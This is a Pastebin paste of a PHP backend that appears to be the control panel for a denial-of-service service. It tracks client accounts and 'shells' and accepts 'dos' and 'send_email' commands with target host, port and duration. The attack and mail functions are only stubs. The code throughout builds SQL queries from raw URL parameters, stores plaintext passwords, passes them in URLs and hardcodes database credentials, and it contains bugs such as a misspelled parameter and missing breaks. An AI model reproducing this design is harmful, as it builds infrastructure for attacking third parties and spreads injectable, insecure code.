Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //configuration
- class Config {
- public static $mysql_user = "ilia";
- public static $mysql_pass = "pass";
- public static $mysql_server = "localhost";
- public static $mysql_database = "ilia";
- public static $mysql_table_prefix = "";
- }
- //error response codes
- class ErrorCode {
- /*
- public static $MISSING_PARAMETERS = 1;
- public static $AUTHENTICATION_FAILED = 2;
- public static $USER_NOT_FOUND = 3;
- public static $LOGIN_FAILED = 4;
- public static $ACCESS_DENIED = 5;
- public static $INVALID_COMMAND = 6;
- */
- public static $MISSING_PARAMETERS = "missing params";
- public static $AUTHENTICATION_FAILED = "authentication failed";
- public static $USER_NOT_FOUND = "user not found";
- public static $LOGIN_FAILED = "login failed";
- public static $ACCESS_DENIED = "access denied";
- public static $INVALID_COMMAND = "invalid command";
- }
- class ServletInterface {
- public static function dos($host, $port, $shells, $time){
- echo "dossing now!";
- }
- public static function email($to, $from, $email, $subject, $message){
- echo "sending email!";
- }
- }
- class Session {
- //stores all the user info
- private $user = array();
- //user info is loaded in the constructor
- public function __construct() {
- //make sure the user parameter is set
- Util::isset_m('user');
- $this->user = Mysql::getUserRow($_GET['user']);
- //make sure user exists
- if($this->user == null) {
- Util::error(ErrorCode::$USER_NOT_FOUND);
- }
- }
- //login function
- public function login() {
- //make sure the pass is set
- Util::isset_m('pass');
- if($this->user['pass'] == $_GET['pass']) {
- //update the database
- $this->user['id'] = Util::random_str(20);
- $this->user['ip'] = $_SERVER['REMOTE_ADDR'];
- $this->user['time'] = time();
- Mysql::setSession($this->user['name'], $this->user['id'], $this->user['time'], $this->user['ip']);
- //echo out all the info
- Util::report_info($this->user);
- }else {
- Util::error(ErrorCode::$LOGIN_FAILED);
- }
- }
- //clear the session id
- public function logout() {
- Mysql::clearSession($this->user['name']);
- }
- //output account info
- public function getAccountInfo() {
- Util::report_info($this->user);
- }
- //check if the session id is correct
- public function checkId() {
- Util::isset_m('session_id');
- if($this->user['id'] != $_GET['session_id']) {
- Util::error(ErrorCode::$AUTHENTICATION_FAILED);
- }
- }
- //make sure the user is admin
- public function checkAdmin() {
- if($this->user['type'] != "admin") {
- Util::error(ErrorCode::$ACCESS_DENIED);
- }
- }
- //lock the account
- public function lockAccount() {
- Mysql::setStatus($this->user['name'], "locked");
- }
- //unlock the account
- public function unlockAccount() {
- Mysql::setStatus($this->user['name'], "active");
- }
- }
- class Mysql {
- private static $con = null;
- // Connect to the mysql database.
- public static function connect() {
- self::$con = @mysql_connect(Config::$mysql_server, Config::$mysql_user, Config::$mysql_pass);
- if(!self::$con){
- echo "SERVER MYSQL CONNECTION ERROR";
- exit(0);
- }
- mysql_select_db(Config::$mysql_database, self::$con);
- }
- // Disconnect from the mysql database.
- public static function disconnect() {
- if(self::$con) {
- mysql_close(self::$con);
- }
- }
- // Create a user into the mysql user table.
- public static function createUser($user, $pass, $account_type, $extra_info) {
- $time = time();
- $query = "INSERT INTO " . Config::$mysql_table_prefix . "clients (user, pass, session_id, session_timeout, session_ip, account_status, active_shells, account_type, extra_info) VALUES ('$user', '$pass', '0', '$time' , '0', 'active', '0', '$account_type', '$extra_info');";
- mysql_query($query);
- }
- //set the session information
- public static function setSession($user, $session_id, $session_time, $session_ip) {
- $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '$session_id', session_ip = '$session_ip', session_timeout = '$session_time' WHERE user = '$user'";
- mysql_query($query);
- }
- //clear the session information
- public static function clearSession($user) {
- $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '0', session_timeout = '0' WHERE user = '$user'";
- mysql_query($query);
- }
- //get the user's info and return it as an array
- public static function getUserRow($user) {
- $query = "SELECT * FROM " . Config::$mysql_table_prefix . "clients WHERE user = '$user' LIMIT 1;";
- $result = mysql_query($query);
- $user = array();
- if(mysql_num_rows($result) == 1) {
- $resultArray = mysql_fetch_array($result);
- $user['name'] = $resultArray['user'];
- $user['ip'] = $resultArray['session_ip'];
- $user['id'] = $resultArray['session_id'];
- $user['time'] = $resultArray['session_timeout'];
- $user['status'] = $resultArray['account_status'];
- $user['shells'] = $resultArray['active_shells'];
- $user['type'] = $resultArray['account_type'];
- $user['pass'] = $resultArray['pass'];
- $user['info'] = $resultArray['extra_info'];
- }else {
- $user = null;
- }
- return $user;
- }
- //return the number of shells
- public static function getShellCount() {
- $query = "SELECT COUNT(*) FROM " . Config::$mysql_table_prefix . "shells";
- return mysql_query($query);
- }
- //set the user account status
- public static function setStatus($u, $status) {
- $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET account_status = '$status' WHERE user = '$u' LIMIT 1;";
- mysql_query($query);
- }
- }
- class Util {
- //make sure parameters are set
- public static function isset_m(/*...*/) {
- $params = func_get_args();
- foreach($params as $param) {
- if(!isset($_GET[$param])) {
- self::error(ErrorCode::$MISSING_PARAMETERS);
- }
- }
- }
- //create a random string
- public static function random_str($length) {
- $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
- $len = strlen($characters);
- $rand = "";
- for ($i = 0; $i < $length; $i++) {
- $rand .= $characters[mt_rand(0, $len - 1)];
- }
- return $rand;
- }
- //report error
- public static function error($msg) {
- echo "<error> $msg </error>";
- Mysql::disconnect();
- exit(0);
- }
- //report success
- public static function success($msg) {
- echo "<success> $msg </success>";
- Mysql::disconnect();
- exit(0);
- }
- //display account info as xml
- public static function report_info($user) {
- $total_shells = Mysql::getShellCount();
- $info = "<account>\n";
- $info .= " <session_id>" . $user['id'] . "</session_id>\n";
- $info .= " <total_shells>" . $total_shells . "</total_shells>\n";
- $info .= " <active_shells>" . $user['shells'] . "</active_shells>\n";
- $info .= " <account_status>" .$user['status'] . "</account_status>\n";
- $info .= " <account_type>" . $user['type'] . "</account_type>\n";
- $info .= "</account>";
- echo $info;
- Mysql::disconnect();
- exit(0);
- }
- //display errors
- public static function show_errors() {
- error_reporting(E_ALL);
- ini_set('display_errors', '1');
- }
- //hide errors
- public static function hide_errors() {
- error_reporting(E_COMPILE_ERROR);
- ini_set('display_errors', '0');
- }
- }
- //display all php errors
- Util::show_errors();
- //connect to mysql
- Mysql::connect();
- //create the user session
- $session = new Session();
- //make sure there is a command
- Util::isset_m('cmd');
- //authenticate
- if($_GET['cmd'] == "login") {
- $session->login();
- }else{
- $session->checkId();
- }
- //parse the commands
- switch ($_GET['cmd']) {
- case "logout":
- $session->logout();
- Util::success("Logout Successful");
- break;
- case "dos":
- Util::isset_m('host','port','time','shells');
- ServletInterface::dos($_GET['hot'], $_GET['port'], $_GET['shells'], $_GET['time']);
- break;
- case "unlock_account":
- $session->checkAdmin();
- $session->unlockAccount();
- Util::success("Account Unlocked");
- break;
- case "lock_account":
- $session->checkAdmin();
- $session->lockAccount();
- Util::success("Account Locked");
- break;
- case "create_user":
- $session->checkAdmin();
- Util::isset_m('n_user','n_pass','n_type','n_info');
- Mysql::createUser($_GET['n_user'], $_GET['n_pass'], $_GET['n_type'], $_GET['n_info']);
- Util::success("User Created");
- break;
- case "send_email":
- Util::isset_m('to','from','email','subject','message');
- ServletInterface::email($_GET['to'], $_GET['from'], $_GET['email'], $_GET['subject'], $_GET['message']);
- case "account_info":
- $session->getAccountInfo();
- default:
- Util::error(ErrorCode::$INVALID_COMMAND);
- break;
- }
- Mysql::disconnect();
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement